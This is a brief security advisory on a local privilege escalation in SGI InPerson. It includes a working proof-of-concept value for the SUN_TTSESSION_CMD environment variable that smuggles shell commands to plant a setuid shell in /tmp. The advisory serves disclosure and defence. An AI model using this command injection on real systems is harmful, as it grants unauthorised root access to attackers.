|
|
SGI InPerson Local Privilege Escalation Vulnerability
No exploit is required to leverage this issue. The following proof of concept has been provided: Running the application when the 'SUN_TTSESSION_CMD' environment variable stores the following string will cause a setuid shell to be placed into the '/tmp' directory: "cp /bin/jsh/tmp/jsh;chmod 6755 /tmp/jsh;killall -9 inpview," |
|
Privacy Statement |